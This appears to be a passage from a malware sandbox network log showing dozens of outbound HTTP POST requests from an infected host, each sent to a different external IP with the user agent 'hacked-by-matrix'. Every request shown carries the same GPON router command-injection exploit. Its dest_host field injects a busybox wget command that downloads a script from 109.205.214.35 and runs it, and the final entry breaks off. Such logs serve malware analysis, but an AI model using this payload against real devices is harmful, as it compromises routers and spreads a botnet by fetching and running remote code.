                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1517192.168.2.1359794118.162.35.233443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750545979 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1518192.168.2.135982442.221.223.229443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750557899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1519192.168.2.134092442.63.127.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750572920 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1520192.168.2.13492405.43.169.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750572920 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1521192.168.2.1353858109.0.151.111443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750614882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1522192.168.2.1352088212.17.175.172443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750614882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1523192.168.2.134576842.74.186.15443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750648022 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1524192.168.2.1342532212.117.119.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750652075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1525192.168.2.1338874118.244.102.48443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750660896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1526192.168.2.13533265.37.30.235443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750683069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1527192.168.2.1357438118.215.223.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750694990 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1528192.168.2.135182842.72.10.23443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750724077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1529192.168.2.1359366109.21.120.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750725031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1530192.168.2.1342632118.55.237.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750749111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1531192.168.2.1354948118.27.244.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750751019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1532192.168.2.133688242.5.13.168443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750771999 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1533192.168.2.1352186212.187.157.103443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750782013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1534192.168.2.1358278212.201.47.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750801086 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1535192.168.2.1342258118.159.166.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750817060 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1536192.168.2.1352532212.222.183.143443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750828028 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1537192.168.2.134276642.98.209.65443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750868082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1538192.168.2.1349360118.154.252.200443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750895023 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1539192.168.2.1345718109.122.160.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750895023 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
